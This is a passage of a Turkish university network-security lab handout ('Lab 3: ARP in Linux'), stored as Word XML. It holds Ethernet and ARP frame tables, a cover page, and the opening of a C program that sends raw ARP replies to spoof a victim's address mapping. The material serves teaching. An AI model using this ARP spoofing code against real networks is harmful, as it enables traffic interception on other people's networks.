            <w:tcW w:w="9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MAC source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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AA0EC8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hyperlink r:id="rId22" w:tooltip="802.1Q" w:history="1">
              <w:r w:rsidR="00B17365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802.1Q</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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tag (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="184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AA0EC8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hyperlink r:id="rId23" w:tooltip="Ethertype" w:history="1">
              <w:r w:rsidR="00B17365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Ethertype</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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(</w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:tooltip="Ethernet II" w:history="1">
              <w:r w:rsidR="00B17365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Ethernet II</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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) or length (</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:tooltip="IEEE 802.3" w:history="1">
              <w:r w:rsidR="00B17365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IEEE 802.3</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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AA0EC8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hyperlink r:id="rId26" w:tooltip="Frame check sequence" w:history="1">
              <w:r w:rsidR="00B17365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Frame check sequence</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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(32</w:t>
            </w:r>
            <w:r w:rsidR="00B1736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noBreakHyphen/>
              <w:t>bit </w:t>
            </w:r>
            <w:hyperlink r:id="rId27" w:tooltip="Cyclic redundancy check" w:history="1">
              <w:r w:rsidR="00B17365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CRC</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B1736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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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AA0EC8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hyperlink r:id="rId28" w:tooltip="Interpacket gap" w:history="1">
              <w:r w:rsidR="00B17365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Interpacket gap</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17365" w:rsidTr="00B17365">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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85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7 </w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:tooltip="Octet (computing)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octets</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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1 octet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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6 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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6 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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(4 octets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="184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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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46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noBreakHyphen/>
              <w:t>1500 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Style w:val="nowrap"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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12 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17365" w:rsidTr="00291B1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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1925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7072" w:type="dxa"/>
            <w:gridSpan w:val="6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DDD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121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B17365" w:rsidRDefault="00B17365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</w:tr>
    </w:tbl>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00291B1A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9983" w:type="dxa"/>
        <w:tblInd w:w="-46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3799"/>
        <w:gridCol w:w="4629"/>
      </w:tblGrid>
      <w:tr w:rsidR="00291B1A" w:rsidRPr="0064386E" w:rsidTr="009D02CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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8B6692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Ethernet</w:t>
            </w:r>
            <w:r w:rsidR="00FB7AA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 xml:space="preserve"> çerçevesindeki </w:t>
            </w:r>
            <w:r w:rsidR="00FB7AAE" w:rsidRPr="00FB7AA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ARP İsteğinin Yapısı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Octet offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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1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0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Hardware type (HTYPE)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2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Protocol type (PTYPE)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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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Hardware address length (HLEN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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Protocol address length (PLEN)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6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Operation (OPER)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8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F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Sender hardware address (SHA) (first 2 bytes)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lastRenderedPageBreak/>
              <w:t>10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F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(next 2 bytes)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12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F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(last 2 bytes)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14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FFD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Sender protocol address (SPA) (first 2 bytes)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16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FFD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(last 2 bytes)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18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Target hardware address (THA) (first 2 bytes)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20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(next 2 bytes)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22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(last 2 bytes)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24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Target protocol address (TPA) (first 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00291B1A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26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64386E" w:rsidRDefault="00291B1A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(last 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00D80BAD" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Buraya ARP </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Replay (yanıt) için</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRPr="00291B1A" w:rsidRDefault="00291B1A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-103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"/>
        <w:gridCol w:w="857"/>
        <w:gridCol w:w="1068"/>
        <w:gridCol w:w="917"/>
        <w:gridCol w:w="928"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1216"/>
      </w:tblGrid>
      <w:tr w:rsidR="00291B1A" w:rsidTr="003504E8">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="1216" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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Pr="00B17365" w:rsidRDefault="00161F8B" w:rsidP="00FB7AAE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161F8B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 xml:space="preserve">ARP </w:t>
            </w:r>
            <w:r w:rsidR="00FB7AA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yanıtı içeren</w:t>
            </w:r>
            <w:r w:rsidRPr="00161F8B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 xml:space="preserve"> 802.3 Ethernet çerçeve yapısı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00291B1A" w:rsidTr="003504E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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Preamble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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Start of frame delimiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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MAC destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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MAC source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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AA0EC8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hyperlink r:id="rId30" w:tooltip="802.1Q" w:history="1">
              <w:r w:rsidR="00291B1A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802.1Q</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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tag (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="184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AA0EC8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hyperlink r:id="rId31" w:tooltip="Ethertype" w:history="1">
              <w:r w:rsidR="00291B1A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Ethertype</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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(</w:t>
            </w:r>
            <w:hyperlink r:id="rId32" w:tooltip="Ethernet II" w:history="1">
              <w:r w:rsidR="00291B1A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Ethernet II</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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) or length (</w:t>
            </w:r>
            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.3" w:history="1">
              <w:r w:rsidR="00291B1A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IEEE 802.3</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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AA0EC8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hyperlink r:id="rId34" w:tooltip="Frame check sequence" w:history="1">
              <w:r w:rsidR="00291B1A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Frame check sequence</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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(32</w:t>
            </w:r>
            <w:r w:rsidR="00291B1A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noBreakHyphen/>
              <w:t>bit </w:t>
            </w:r>
            <w:hyperlink r:id="rId35" w:tooltip="Cyclic redundancy check" w:history="1">
              <w:r w:rsidR="00291B1A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CRC</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00291B1A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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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AA0EC8" w:rsidP="003504E8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hyperlink r:id="rId36" w:tooltip="Interpacket gap" w:history="1">
              <w:r w:rsidR="00291B1A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0B0080"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Interpacket gap</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00291B1A" w:rsidTr="003504E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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85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7 </w:t>
            </w:r>
            <w:hyperlink r:id="rId37" w:tooltip="Octet (computing)" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="0B0080"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>octets</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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1 octet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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6 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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6 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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(4 octets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="184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2 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>1500 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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Style w:val="nowrap"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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</w:rPr>
              <w:t>12 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00291B1A" w:rsidTr="003504E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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1925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7072" w:type="dxa"/>
            <w:gridSpan w:val="6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DDD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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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91B1A" w:rsidRDefault="00291B1A" w:rsidP="003504E8">
            <w:pPr>
              <w:spacing w:before="240" w:after="240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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00291B1A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00291B1A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9983" w:type="dxa"/>
        <w:tblInd w:w="-330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3799"/>
        <w:gridCol w:w="4629"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17365" w:rsidRPr="0064386E" w:rsidTr="009D02CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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161F8B" w:rsidP="00FB7AAE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 xml:space="preserve">Ethernet </w:t>
            </w:r>
            <w:r w:rsidR="00FB7AA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 xml:space="preserve">çerçevesindeki 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 xml:space="preserve">ARP Yanıt </w:t>
            </w:r>
            <w:r w:rsidR="00FB7AA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yapısı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Octet offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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1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0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Hardware type (HTYPE)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2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Protocol type (PTYPE)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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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Hardware address length (HLEN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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Protocol address length (PLEN)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6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Operation (OPER)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8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F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Sender hardware address (SHA) (first 2 bytes)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10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F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(next 2 bytes)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12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F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(last 2 bytes)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14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FFD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Sender protocol address (SPA) (first 2 bytes)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16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D0FFD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(last 2 bytes)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18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Target hardware address (THA) (first 2 bytes)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20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(next 2 bytes)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22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(last 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17365" w:rsidRPr="0064386E" w:rsidTr="009D02CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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tr-TR"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8428" w:type="dxa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0F0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B17365" w:rsidRPr="0064386E" w:rsidRDefault="00B17365" w:rsidP="003504E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</w:pPr>
            <w:r w:rsidRPr="0064386E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="tr-TR"/>
              </w:rPr>
              <w:t>Target protocol address (TPA) (first 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D97525" w:rsidRDefault="00D97525">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062541F" w:rsidRDefault="003020B3" w:rsidP="009D02CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ek 1. Kapak sayfası</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062541F" w:rsidRPr="00C44EF2" w:rsidRDefault="003020B3" w:rsidP="00C44EF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Doğu Akdeniz Üniversitesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003020B3" w:rsidRPr="00C44EF2" w:rsidRDefault="003020B3" w:rsidP="003020B3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bilgisayar Mühendisliği Bölümü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRDefault="00C44E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44EF2" w:rsidRDefault="00C44E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44EF2" w:rsidRDefault="00C44E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44EF2" w:rsidRPr="00AA6BF9" w:rsidRDefault="003020B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0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Ders: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BLGM</w:t>
      </w:r>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>455</w:t>
      </w:r>
      <w:r w:rsidR="00161F8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Bilgisayar Sistemleri ve Ağ</w:t>
      </w:r>
      <w:r w:rsidRPr="003020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Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRDefault="00161F8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Öğretim Üyesi</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B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Gürcü Öz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRDefault="00C44E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44EF2" w:rsidRDefault="00C44E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44EF2" w:rsidRPr="00AA6BF9" w:rsidRDefault="003020B3" w:rsidP="00C44EF2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 3: Linux'ta ARP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00161F8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30.10.2019-6.11</w:t>
      </w:r>
      <w:r w:rsidR="00C44EF2" w:rsidRPr="00C44EF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00161F8B">
      <w:pPr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Lab Asistanı</w:t>
      </w:r>
      <w:r w:rsidR="00C44EF2" w:rsidRPr="00C44EF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C44EF2" w:rsidRPr="00C44EF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 </w:t>
      </w:r>
      <w:r w:rsidR="003B60F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Samed Reyhanlı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2">
      <w:pPr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44EF2" w:rsidRDefault="003020B3">
      <w:pPr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Öğrenci</w:t>
      </w:r>
      <w:r w:rsidR="00161F8B"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Numarası:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161F8B" w:rsidRDefault="00161F8B">
      <w:pPr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Adı:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161F8B" w:rsidRDefault="00161F8B">
      <w:pPr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Soyadı:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRDefault="00FB7AAE">
      <w:pPr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Grup üyeleri:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161F8B" w:rsidRPr="00C44EF2" w:rsidRDefault="00161F8B">
      <w:pP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C44EF2" w:rsidRPr="00C44EF2" w:rsidTr="00C44EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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C44EF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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="003020B3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Öğ.No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="003020B3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İsim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="003020B3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Soyisim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidTr="00C44EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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C44EF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303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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03" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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03" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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C44EF2" w:rsidRPr="00C44EF2" w:rsidTr="00C44EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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C44EF2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303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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03" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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03" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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</w:tbl>
    <w:p w:rsidR="00C44EF2" w:rsidRPr="00C44EF2" w:rsidRDefault="00C44EF2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C44EF2" w:rsidRDefault="00C44EF2" w:rsidP="00C44E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44EF2" w:rsidRDefault="00C44EF2" w:rsidP="00C44E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44EF2" w:rsidRDefault="00C44EF2" w:rsidP="00C44E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44EF2" w:rsidRDefault="00C44EF2" w:rsidP="00C44EF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541F" w:rsidRDefault="003020B3" w:rsidP="00C44EF2">
      <w:pPr>
        <w:jc w:val="center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Gazimağusa,</w:t>
      </w:r>
      <w:r w:rsidR="00161F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Kuzey Kıbrıs Türk Cumhuriyeti</w:t>
      </w:r>
      <w:r w:rsidR="0062541F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRPr="00D93311" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D93311">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix 2. Sendarp3.c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//Adapted by Alexander G. Chefranov 24.04.2019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//Modified by Tansel Sarihan 25.10.2019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/* Copyright (C) 2011-2015 P.D. Buchan (pdbuchan@yahoo.com)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   This program is free software: you can redistribute it and/or modify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   it under the terms of the GNU General Public License as published by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   the Free Software Foundation, either version 3 of the License, or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   (at your option) any later version.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   This program is distributed in the hope that it will be useful,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   but WITHOUT ANY WARRANTY; without even the implied warranty of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   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the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   GNU General Public License for more details.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   You should have received a copy of the GNU General Public License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   along with this program. If not, see &lt;http://www.gnu.org/licenses/&gt;.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*/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 Send an IPv4 ARP packet via raw socket at the link layer (ethernet frame).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 Values set for ARP request.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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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&lt;unistd.h&gt;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close()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&lt;string.h&gt;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strcpy, memset(), and memcpy()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&lt;netdb.h&gt;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struct addrinfo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&lt;sys/types.h&gt;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needed for socket(), uint8_t, uint16_t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&lt;sys/socket.h&gt;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needed for socket()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&lt;netinet/in.h&gt;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IPPROTO_RAW, INET_ADDRSTRLEN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&lt;netinet/ip.h&gt;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IP_MAXPACKET (which is 65535)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&lt;arpa/inet.h&gt;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inet_pton() and inet_ntop()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&lt;sys/ioctl.h&gt;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macro ioctl is defined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&lt;bits/ioctls.h&gt;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defines values for argument "request" of ioctl.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&lt;net/if.h&gt;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struct ifreq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&lt;linux/if_ether.h&gt;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ETH_P_ARP = 0x0806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&lt;linux/if_packet.h&gt;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struct sockaddr_ll (see man 7 packet)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&lt;net/ethernet.h&gt;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#include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&lt;errno.h&gt;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errno, perror()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 Define a struct for ARP header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typedef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struct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_arp_hdr arp_hdr;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struct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_arp_hdr{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uint16_t htype;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uint16_t ptype;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uint8_t hlen;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uint8_t plen;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uint16_t opcode;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uint8_t sender_mac[6];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uint8_t sender_ip[4];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uint8_t target_mac[6];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uint8_t target_ip[4];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// Define some constants.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#define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ETH_HDRLEN 14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Ethernet header length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#define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IP4_HDRLEN 20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IPv4 header length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#define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ARP_HDRLEN 28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ARP header length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#define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ARPOP_REQUEST 1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Taken from &lt;linux/if_arp.h&gt;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#define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ARPOP_REPLY 2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Taken from &lt;linux/if_arp.h&gt;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main(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argc,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char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**argv){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(argc!=7){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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        printf(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"Usage of the program:\n%s &lt;iface_name&gt; &lt;attacker_ip&gt; &lt;spoof_mac&gt; &lt;victim_ip&gt; &lt;victim_mac&gt; &lt;nr_of_reply&gt;\n"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,argv[0]);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exit(1);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else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i,status,frame_length,sd,bytes;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//char *interface, *target, *src_ip;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arp_hdr arphdr;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//uint8_t *src_mac, *dst_mac, *ether_frame;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struct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addrinfo hints, *res;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struct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sockaddr_in *ipv4;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struct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sockaddr_ll device;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struct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ifreq ifr;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unsigned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char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interface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[40],target[INET_ADDRSTRLEN],src_ip[INET_ADDRSTRLEN];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uint8_t src_mac[6],src_mac1[6],dst_mac[6],ether_frame[IP_MAXPACKET];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values[6];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//int i;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(6==sscanf(argv[3],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"%x:%x:%x:%x:%x:%x%*c"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,&amp;values[0],&amp;values[1],&amp;values[2],&amp;values[3],&amp;values[4],&amp;values[5])){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for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(i=0;i&lt;6;i++){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src_mac1[i]=(uint8_t)values[i];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//uint8_t src_mac1[6]={0x00,0x11,0x22,0x33,0x44,0x55};//changed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//int i;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printf(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"we start\n"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Interface to send packet through.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//strcpy (interface, "eth0");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strcpy(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interface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,argv[1]);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printf(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"interface==%s\n"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,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interface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//Submit request for a socket descriptor to look up 